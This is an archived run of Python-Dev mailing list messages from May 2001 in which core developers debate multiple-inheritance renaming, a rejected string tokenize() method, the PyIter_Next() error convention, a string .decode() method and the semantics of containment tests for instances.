...or would the "rename" syntax also hide the "foo" and "bar" names from
X's effective namespace[1]?  In that case, I guess some special syntax
is needed.

[1] "effective namespace" -- the union of X's class dict with all its
superclasses' dicts; not actually X's namespace, but the set of names you
can use in X.  I think.  Err, whatever.

        Greg


From gward at python.net  Fri May  4 20:15:51 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:15:51 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <20010504141551.B1167@gerg.ca>

On 04 May 2001, M.-A. Lemburg said:
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
> 
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
> 
> I like this method -- should I review the code and then check it in ?

I concur with /F: -1 because you can do it easily with re.split().

        Greg
-- 
Greg Ward - Unix bigot                                  gward at python.net
http://starship.python.net/~gward/
I hope something GOOD came in the mail today so I have a REASON to live!!


From guido at digicool.com  Fri May  4 20:36:14 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:36:14 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT."
             <20010504141244.A1167@gerg.ca> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>  
            <20010504141244.A1167@gerg.ca> 
Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com>

> On 03 May 2001, Paul F. Dubois said:
> > 1. The simple case, X inherits from Y and in defining foo and bar needs to
> > use Y's version:
> > 
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):

[Greg Ward]
> Maybe I'm being thick, but don't you get the same effect by doing this:
> 
> class X (Y):
>     _sfoo = Y.foo
>     _sbar = Y.bar
> 
> ...or would the "rename" syntax also hide the "foo" and "bar" names from
> X's effective namespace[1]?  In that case, I guess some special syntax
> is needed.

Paul's point is that the rename thing makes it possible to deprecate
the form Y.foo, which is causing the basic ambiguity here.

> [1] "effective namespace" -- the union of X's class dict with all its
> superclass' dicts; not actually X's namespace, but the set of names you
> can use in X.  I think.  Err, whatever.

Probably irrelevant.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May  4 20:38:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:38:06 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT."
             <20010504141551.B1167@gerg.ca> 
References: <3AF27088.DE495210@lemburg.com>  
            <20010504141551.B1167@gerg.ca> 
Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com>

> On 04 May 2001, M.-A. Lemburg said:
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> > 
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> > 
> > I like this method -- should I review the code and then check it in ?
> 
> I concur with /F: -1 because you can do it easily with re.split().

-1 also.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 20:51:26 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 14:51:26 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>

[MAL]
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1 here.  Easily enough done via other means, and you just *know* different
people will want different variants of tokenization (e.g., nobody in their
right mind will want " two " coming back from that example, and, given that
it does, that it doesn't also return " three" is baffling).

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

+1 from me:  it's the other half of the existing .encode() method, and the
current lack of symmetry is icky.


From barry at digicool.com  Fri May  4 20:57:09 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Fri, 4 May 2001 14:57:09 -0400
Subject: [Python-Dev] Multiple inheritance
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
	<20010503131714.D21814@inetnebr.com>
Message-ID: <15090.64389.746625.331215@anthem.wooz.org>

>>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

    >> class X (Y rename foo as _sfoo, bar as _sbar ):

    | Why not let us spell this as:
    | 	class X(Y):
    | 		from Y import foo as _sfoo, bar as _sbar
    | 		...

>>>>> "NS" == Neil Schemenauer <nas at python.ca> writes:

    NS> This already has a meaning in Python.  Paul's suggested syntax
    NS> is pretty neat, IMHO.

Not if Y is a class though, right?  That would currently raise an
ImportError, so why not hijack it for this purpose?  I think it has a
natural and clear enough meaning without requiring additional
keywords, or complicating the base class specification syntax.

-Barry


From tim.one at home.com  Fri May  4 22:50:03 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 16:50:03 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>

In spare moments, I've been plugging away at making various functions work
nice with iterators (map, min, max, etc).

Over and over this requires writing code of the form:

	op2 = PyIter_Next(it);
	if (op2 == NULL) {
		/* StopIteration is *implied* by a NULL return from
		 * PyIter_Next() if PyErr_Occurred() is false.
		 */
		if (PyErr_Occurred()) {
			if (PyErr_ExceptionMatches(PyExc_StopIteration))
				PyErr_Clear();
			else
				goto Fail;
		}
		break;
	}

This is wordy, obscure, and in my experience is needed every time I call
PyIter_Next().

So I'd like to hide this in PyIter_Next instead, like so:

/* Return next item.
 * If an error occurs, return NULL and set *error=1.
 * If the iteration terminated normally, return NULL and set *error=0.
 * Else return the next object and set *error=0.
 */
PyObject *
PyIter_Next(PyObject *iter, int *error)
{
	PyObject *result;
	if (!PyIter_Check(iter)) {
		PyErr_Format(PyExc_TypeError,
			     "'%.100s' object is not an iterator",
			     iter->ob_type->tp_name);
		*error = 1;
		return NULL;
	}
	result = (*iter->ob_type->tp_iternext)(iter);
	*error = 0;
	if (result)
		return result;
	if (PyErr_Occurred()) {
		if (PyErr_ExceptionMatches(PyExc_StopIteration))
			PyErr_Clear();
		else
			*error = 1;
	}
	/* Else StopIteration is implicit, and there is no error. */
	return NULL;
}

Then *calls* could be the simpler:

	op2 = PyIter_Next(it, &error);
	if (op2 == NULL) {
		if (error)
			goto Fail;
		break;
	}

Objections?  So far I'm almost the only user of PyIter_Next(); the only other
use is in ceval's FOR_ITER, which goes thru a similar dance.

However, I'm not clear on why FOR_ITER doesn't clear the exception if
PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
true -- that sure smells like a bug (but, if so, the change above would
squash it by magic).

Note that I'm not proposing to change the signature of the tp_iternext slot
similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.


From guido at digicool.com  Sat May  5 00:03:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 17:03:36 -0500
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400."
             <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>

> In spare moments, I've been plugging away at making various functions work
> nice with iterators (map, min, max, etc).

For which efforts I extend my greatest thanks!

> Over and over this requires writing code of the form:
> 
[etc.]
> 
> This is wordy, obscure, and in my experience is needed every time I call
> PyIter_Next().
> 
> So I'd like to hide this in PyIter_Next instead, like so:
> 
> /* Return next item.
>  * If an error occurs, return NULL and set *error=1.
>  * If the iteration terminated normally, return NULL and set *error=0.
>  * Else return the next object and set *error=0.
>  */
> PyObject *
> PyIter_Next(PyObject *iter, int *error)
> {
[etc.]
> }

> Then *calls* could be the simpler:
> 
> 	op2 = PyIter_Next(it, &error);
> 	if (op2 == NULL) {
> 		if (error)
> 			goto Fail;
> 		break;
> 	}

I originally had this API for tp_iternext, and changed it to the
current API because I got tired of having to declare the error
variable.

How about making PyIter_Next() call PyErr_Clear() when the exception
is StopIteration?

Then calls could be

    op2 = PyIter_Next(it);
    if (op2 == NULL) {
        if (PyErr_Occurred())
            goto Fail;
        break;
    }

This is a tad slower and arguably generates more code (assuming an
extra call is slower than passing an extra argument and loading it)
but doesn't require declaring the error variable.
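At the Python level, the same contract is what the two-argument form of next() provides: a default comes back on normal exhaustion (StopIteration is swallowed), and any other exception propagates. A minimal Python 3 sketch of the calling pattern above; the sentinel _END and the helper drain() are illustrative names, not part of the C API:

```python
_END = object()  # stands in for PyIter_Next() returning NULL with no error set


def drain(iterable, process):
    """Python analogue of the proposed C calling pattern for PyIter_Next()."""
    it = iter(iterable)
    while True:
        # next() with a default clears StopIteration for us, while any other
        # exception propagates out of drain(), like the "goto Fail" branch.
        op2 = next(it, _END)
        if op2 is _END:
            break  # normal end of iteration
        process(op2)


collected = []
drain([1, 2, 3], collected.append)
print(collected)  # [1, 2, 3]
```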

But since you're the customer, it's your choice.

> Objections?  So far I'm almost the only user of PyIter_Next(); the only other
> use is in ceval's FOR_ITER, which goes thru a similar dance.
> 
> However, I'm not clear on why FOR_ITER doesn't clear the exception if
> PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
> true -- that sure smells like a bug (but, if so, the change above would
> squash it by magic).

Smells like a bug indeed.

> Note that I'm not proposing to change the signature of the tp_iternext slot
> similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 23:18:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 17:18:16 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFMKAAA.tim.one@home.com>

[Tim]
>> In spare moments, I've been plugging away at ... iterators

[Guido]
> For which efforts I extend my greatest thanks!

Yet but a pale reflection of the thanks I extend to you for implementing
these guys to begin with:  they're *loads* of fun!  But not nearly as much
fun as playing with Perl, so they're still prudently Pythonic <wink>.

[T proposed adding an int* error arg to PyIter_Next()]

[G]
> How about making PyIter_Next() call PyErr_Clear() when the exception
> is StopIteration?
>
> Then calls could be
>
>     op2 = PyIter_Next(it);
>     if (op2 == NULL) {
>         if (PyErr_Occurred())
>             goto Fail;
>         break;
>     }

Perfect.  I'll do that later tonight, and update the PEP to match.

> This is a tad slower and arguably generates more code (assuming an
> extra call is slower than passing an extra argument and loading it)
> but doesn't require declaring the error variable.

Well, it's two more calls (since PyErr_Occurred() also makes a call to get
the thread state), but I don't really care because the client only does this
in case of error or end-of-iteration (which aren't the normal cases).  I was
dreading finding a spare int var to pass inside FOR_ITER anyway <wink>.


From paulp at ActiveState.com  Sat May  5 02:03:05 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Fri, 04 May 2001 17:03:05 -0700
Subject: [Python-Dev] ::
Message-ID: <3AF34339.9C553704@ActiveState.com>

I'll throw out a partially formed thought in case it is useful to
anybody.

"::" might be useful to solve another problem I've been struggling with:
how to have multiple package distributions share a namespace
(xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). 

"::" might mean, in general, that you are walking through abstract,
potentially merged namespaces and not through concrete dictionary
implementations. I think that Python's using the same syntax for package
namespaces and attribute accesses might seem more elegant than it is in
practice. Things that "seem like" they should work do not because
packages are fundamentally different than attributes:

>>> from xml import dom.minidom
  File "<stdin>", line 1
    from xml import dom.minidom
                       ^
SyntaxError: invalid syntax

Why isn't this symmetric? I would like to use "." on either side of the
import

>>> import xml
>>> print xml.dom
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'xml' module has no attribute 'dom'
>>> from xml.dom import minidom
>>> print xml.dom
<module 'xml.dom' from 'c:\program files\python21\lib\xml\dom\__init__.pyc'>

I find it a little bit weird that importing one module has the side
effect of populating a package.
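The side effect is easy to reproduce in modern Python 3 with a throwaway package built in a temporary directory (the package name demo_pkg is hypothetical). The package's __init__.py is empty, yet importing the submodule binds it as an attribute of the package object:

```python
import importlib
import os
import sys
import tempfile


def submodule_binding_demo():
    """Return (before, after): does the package have 'sub' before/after importing it?"""
    with tempfile.TemporaryDirectory() as root:
        pkg_dir = os.path.join(root, "demo_pkg")
        os.makedirs(pkg_dir)
        # An empty __init__.py: the package itself imports nothing.
        open(os.path.join(pkg_dir, "__init__.py"), "w").close()
        with open(os.path.join(pkg_dir, "sub.py"), "w") as f:
            f.write("VALUE = 42\n")

        sys.path.insert(0, root)
        importlib.invalidate_caches()  # let the import system notice the new files
        try:
            pkg = importlib.import_module("demo_pkg")
            before = hasattr(pkg, "sub")  # False: nothing has imported demo_pkg.sub yet
            importlib.import_module("demo_pkg.sub")
            after = hasattr(pkg, "sub")   # True: the import bound 'sub' on the package
        finally:
            sys.path.remove(root)
            sys.modules.pop("demo_pkg.sub", None)
            sys.modules.pop("demo_pkg", None)
        return before, after


print(submodule_binding_demo())  # (False, True)
```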
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido at digicool.com  Sat May  5 05:07:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 22:07:56 -0500
Subject: [Python-Dev] ::
In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST."
             <3AF34339.9C553704@ActiveState.com> 
References: <3AF34339.9C553704@ActiveState.com> 
Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com>

> I find it a little bit weird that importing one module has the side
> effect of populating a package.

That's just because you've seen too much Java. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Sat May  5 10:13:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 05 May 2001 10:13:30 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
Message-ID: <3AF3B62A.50DD4115@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1 here.  Easily enough done via other means, and you just *know* different
> people will want different variants of tokenization (e.g., nobody in their
> right mind will want " two " coming back from that example, and, given that
> it does, that it doesn't also return " three" is baffling).

Ok. I rejected the patch with a mild response to take on this by
subclassing strings in Python 2.2 ;-)

> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> +1 from me:  it's the other half of the existing .encode() method, and the
> current lack of symmetry is icky.

Right.

If I hear no strong objections, I'll check in the .decode()
method next week.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Sat May  5 13:45:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 06:45:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200."
             <3AF0662D.48671B4E@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
            <3AF0662D.48671B4E@lemburg.com> 
Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com>

> I've attached the patch. Due to a small reorganisation the
> patch is a little longer -- symmetry has its price at C level
> too ;-)

Looks good on paper, so go ahead and check it in.  Watch out for
potential changes caused by Tim's iter-crusade!  :-)

While you're at it, why don't you check in the rot13 codec you posted
-- it's good to have simple examples in the standard library.
It would also be cool to have codecs for common file encodings like
base64, quoted-printable, binhex, uuencode, and even hex
(binascii.hexlify).
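In today's Python 3, str no longer has a .decode() method (text and bytes were split), but codecs of the kind listed here (rot13, hex, base64) are reachable through codecs.encode() and codecs.decode(). A sketch of the symmetric round trip, assuming Python 3.4 or later where these codec aliases are available; roundtrip() is an illustrative helper:

```python
import codecs


def roundtrip(data, encoding):
    """Encode data with the named codec, then decode the result back."""
    encoded = codecs.encode(data, encoding)
    decoded = codecs.decode(encoded, encoding)
    return encoded, decoded


print(roundtrip("Hello", "rot13"))  # ('Uryyb', 'Hello')
print(roundtrip(b"hi", "hex"))      # (b'6869', b'hi')
print(roundtrip(b"hi", "base64"))   # (b'aGk=\n', b'hi')
```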

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:15:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:15:52 -0500
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200."
             <3AF3B62A.50DD4115@lemburg.com> 
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>  
            <3AF3B62A.50DD4115@lemburg.com> 
Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com>

> Ok. I rejected the patch with a mild response to take on this by
> subclassing strings in Python 2.2 ;-)

Gustavo didn't take the rejection well.  He contacted me asking for a
better explanation, and we got into a bit of an argument about how
much I must explain my decisions, but I think he understands now.

> If I hear no strong objections, I'll check in the .decode()
> method next week.

Yes, see my previous reply.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:24:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:24:19 -0500
Subject: [Python-Dev] PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST."
             <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
References: <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>

In a checkin message, Tim wrote:
> The full story for instance objects is pretty much unexplainable, because
> instance_contains() tries its own flavor of iteration-based containment
> testing first, and PySequence_Contains doesn't get a chance at it unless
> instance_contains() blows up.  A consequence is that
>     some_complex_number in some_instance
> dies with a TypeError unless some_instance.__class__ defines __iter__ but
> does not define __getitem__.

This kind of thing happens everywhere -- instances always define all
slots but using the slots sometimes fails when the corresponding
__foo__ doesn't exist.  Decisions based on the presence or absence of
a slot are therefore in general not reliable; the only exception is
the decision to *call* the slot or not.  The correct solution is not
to catch AttributeError and pretend that the slot didn't exist (which
would mask an AttributeError occurring inside the __contains__ method
if there was one), but to reimplement the default behavior in the
instance slot implementation.

In this case, that means that PySequence_Contains() can be simplified
(no need to test for AttributeError), and instance_contains() should
fall back to a loop over iter(self) rather than trying to use
instance_item().
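The fallback described above can be approximated in Python 3 terms as follows. This is a sketch of the lookup order, not the C implementation: use __contains__ if the type defines one, otherwise loop over iter(container) comparing with rich equality. Because == is used, a complex number tested against a __getitem__-only container simply compares unequal instead of raising TypeError. OldStyleSeq is a made-up example class:

```python
def contains(container, item):
    """Approximate the lookup order behind 'item in container'."""
    contains_slot = getattr(type(container), "__contains__", None)
    if contains_slot is not None:
        return bool(contains_slot(container, item))
    # Default behavior: loop over iter(container).  iter() itself falls back
    # to the old __getitem__ sequence protocol when __iter__ is missing.
    for element in iter(container):
        # Identity first, then rich comparison (==), not a three-way compare.
        if element is item or element == item:
            return True
    return False


class OldStyleSeq:
    """Defines only __getitem__, like a pre-iterator 'sequence' instance."""

    def __init__(self, data):
        self.data = data

    def __getitem__(self, index):
        return self.data[index]  # IndexError ends the iteration


seq = OldStyleSeq([1, 2, 3])
print(contains(seq, 2), contains(seq, 1j))  # True False
```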

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 22:40:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 16:40:11 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>

[Guido]
> This kind of thing happens everywhere -- instances always define all
> slots but using the slots sometimes fails when the corresponding
> __foo__ doesn't exist.  Decisions based on the presence or absence of
> a slot are therefore in general not reliable; the only exception is
> the decision to *call* the slot or not.  The correct solution is not
> to catch AttributeError and pretend that the slot didn't exist (which
> would mask an AttributeError occurring inside the __contains__ method
> if there was one),

Ya, it sucks.  I was inspired by that instance_contains() itself makes
dubious assumptions about what an AttributeError means when the functions
*it* calls raise it <wink>.

> but to reimplement the default behavior in the instance slot
> implementation.

The "backward compatibility" comment in instance_contains() was scary:
compatibility with *what*?  instance_contains() is pretty darn new.  I
assumed it meant there was *some* good (but unidentified) reason we had to
use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
instance_item() "worked".  But I haven't thought of one, except to ensure
that

    some_complex  in  some_instance_with___getitem__

continues to blow up -- but that's not a good reason.  So:

> In this case, that means that PySequence_Contains() can be simplified
> (no need to test for AttributeError), and instance_contains() should
> fall back to a loop over iter(self) rather than trying to use
> instance_item().

Will do!


From guido at digicool.com  Sat May  5 23:48:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 16:48:33 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400."
             <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>

> [Guido]
> > This kind of thing happens everywhere -- instances always define all
> > slots but using the slots sometimes fails when the corresponding
> > __foo__ doesn't exist.  Decisions based on the presence or absence of
> > a slot are therefore in general not reliable; the only exception is
> > the decision to *call* the slot or not.  The correct solution is not
> > to catch AttributeError and pretend that the slot didn't exist (which
> > would mask an AttributeError occurring inside the __contains__ method
> > if there was one),

[Tim]
> Ya, it sucks.  I was inspired by that instance_contains() itself makes
> dubious assumptions about what an AttributeError means when the functions
> *it* calls raise it <wink>.

Actually, instance_contains checks for AttributeError only after
calling instance_getattr(), whose only purpose is to return the
requested attribute or raise AttributeError, so here it is safe: the
__contains__ function hasn't been called yet.

> > but to reimplement the default behavior in the instance slot
> > implementation.
> 
> The "backward compatibility" comment in instance_contains() was scary:
> compatibility with *what*?

With previous behavior of 'x in instance'.  Before we had
__contains__, 'x in y' *always* iterated over the items of y as a
sequence, comparing them to x one at a time.  The loop does that.

> instance_contains() is pretty darn new.  I
> assumed it meant there was *some* good (but unidentified) reason we had to
> use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
> instance_item() "worked".

No, that was probably just an oversight -- clearly it should have used
rich comparisons.  (I guess this is a disadvantage of the approach I'm
recommending here: if the default behavior changes, the
reimplementation of the default behavior in the class must be changed
too.)

> But I haven't thought of one, except to ensure
> that
> 
>     some_complex  in  some_instance_with___getitem__
> 
> continues to blow up -- but that's not a good reason.

Indeed not.

> So:
> 
> > In this case, that means that PySequence_Contains() can be simplified
> > (no need to test for AttributeError), and instance_contains() should
> > fall back to a loop over iter(self) rather than trying to use
> > instance_item().
> 
> Will do!

Thanks!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:24:58 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:24:58 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>

[Guido]
> Actually, instance_contains checks for AttributeError only after
> calling instance_getattr(), whose only purpose is to return the
> requested attribute or raise AttributeError, so here it is safe: the
> __contains__ function hasn't been called yet.

I'd say "safer", but not "safe":  at that point we only know that *some*
attribute didn't exist, somewhere, while attempting to look up
"__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
hook, like

    def __getattr__(self, attr):
        return global_resolver.resolve(self, attr)

where global_resolver has lost its "resolve" attr.  "except" clauses aren't
more bulletproof in C than in Python <0.9 wink>.
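The masking can be reproduced in Python 3 with a minimal sketch (Resolver, Proxy and global_resolver are hypothetical names): the AttributeError raised by the buggy resolver inside __getattr__ looks, to a caller such as hasattr(), exactly like a genuinely missing attribute.

```python
class Resolver:
    """Hypothetical resolver that has 'lost' its resolve() method."""


global_resolver = Resolver()


class Proxy:
    def __getattr__(self, attr):
        # Bug: global_resolver has no 'resolve', so this raises AttributeError...
        return global_resolver.resolve(self, attr)


p = Proxy()
# ...which hasattr() cannot tell apart from "p has no such attribute".
print(hasattr(p, "spam"))  # False, but for the wrong reason
try:
    p.spam
except AttributeError as exc:
    print(exc)  # the message names 'resolve', not 'spam'
```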

> With previous behavior of 'x in instance'.  Before we had
> __contains__, 'x in y' *always* iterated over the items of y as a
> sequence, comparing them to x one at a time.

I don't believe I ever knew that!  Thanks.  I erroneously assumed that the
looping behavior was *introduced* when __contains__ was added.

> ...
> No, that was probably just an oversight -- clearly it should have used
> rich comparisons.  (I guess this is a disadvantage of the approach I'm
> recommending here: if the default behavior changes, the
> reimplementation of the default behavior in the class must be changed
> too.)

I factored out the new iterator-based __contains__ logic into a new private
API function, called when appropriate by both PySequence_Contains() and
instance_contains().  So any future changes to what iterator-based
__contains__ means will only need to be made in one place.

too-easy<wink>-ly y'rs  - tim


From guido at digicool.com  Sun May  6 00:31:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 17:31:05 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400."
             <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>

> [Guido]
> > Actually, instance_contains checks for AttributeError only after
> > calling instance_getattr(), whose only purpose is to return the
> > requested attribute or raise AttributeError, so here it is safe: the
> > __contains__ function hasn't been called yet.

[Tim]
> I'd say "safer", but not "safe":  at that point we only know that *some*
> attribute didn't exist, somewhere, while attempting to look up
> "__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
> hook, like
> 
>     def __getattr__(self, attr):
>         return global_resolver.resolve(self, attr)
> 
> where global_resolver has lost its "resolve" attr.  "except" clauses aren't
> more bulletproof in C than in Python <0.9 wink>.

Yes, but attribute errors inside __getattr__ hooks are *always* a
problem to debug, since raising AttributeError is part of its job.  So
this is not new.  I should have said "as safe as it gets."

> > With previous behavior of 'x in instance'.  Before we had
> > __contains__, 'x in y' *always* iterated over the items of y as a
> > sequence, comparing them to x one at a time.
> 
> I don't believe I ever knew that!  Thanks.  I erroneously assumed that the
> looping behavior was *introduced* when __contains__ was added.

Surely you knew that "x in y" looped over the items of y?  What else
could it have done?  It was only defined on sequences!

> > ...
> > No, that was probably just an oversight -- clearly it should have used
> > rich comparisons.  (I guess this is a disadvantage of the approach I'm
> > recommending here: if the default behavior changes, the
> > reimplementation of the default behavior in the class must be changed
> > too.)
> 
> I factored out the new iterator-based __contains__ logic into a new private
> API function, called when appropriate by both PySequence_Contains() and
> instance_contains().  So any future changes to what iterator-based
> __contains__ means will only need to be made in one place.

Cool.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:53:51 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:53:51 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHHKAAA.tim.one@home.com>

[Guido]
> ...
> Surely you knew that "x in y" looped over the items of y?  What else
> could it have done?  It was only defined on sequences!

What's a sequence <wink>?  I expect I assumed that enduring a Python method
call for every element of an *instance* was so expensive that Python didn't
bother implementing "in" for instances (just for builtin sequences like lists
and strings etc).  I *know* I assumed it was so expensive that I never tried
it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting
"if x in s" where s was a tuple, list or string of length no more than 4; for
anything bigger I always used a dict or bisect).  So it's a personal blind
spot likely due to never looking in that direction.


From paul at pfdubois.com  Sun May  6 03:10:37 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Sat, 5 May 2001 18:10:37 -0700
Subject: [Python-Dev] multiple inheritance -- what I meant
Message-ID: <ADEOIFHFONCLEEPKCACCKEPMCIAA.paul@pfdubois.com>

When I suggested a modification to the inheritance clause,

class X (Y rename a as b, c as d, Z rename foo as bar):

someone suggested this was the same as

class X (Y, Z):
    b = Y.a
    d = Y.c
    bar = Z.foo

I meant two things by my suggestion:

1. I meant that Y.a would never be found when searching for X.a.

In particular, if Z.a exists, and a is not explicitly defined in X, X.a is
Z.a.

2. More philosophically, rather than being a consequence of the language
like the second method is, the proposed syntax is intended to be a clear
message to someone reading the class about how the inherited names are being
handled. Compare the effort required of a reader to understand these two.
(If you think the second one is easier, you probably attended Spam III.)

If you can rename in this way there are no problems with multiple
inheritance.

To be complete you should probably also allow

Y undefine x, ...

which simply makes Y.x unavailable from X.
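A short Python 3 sketch of the difference behind point 1 (the classes are made up for illustration): the aliasing spelling adds b, but lookup of a still finds Y.a first through the method resolution order, so making X.a mean Z.a has to be spelled out by hand:

```python
class Y:
    def a(self):
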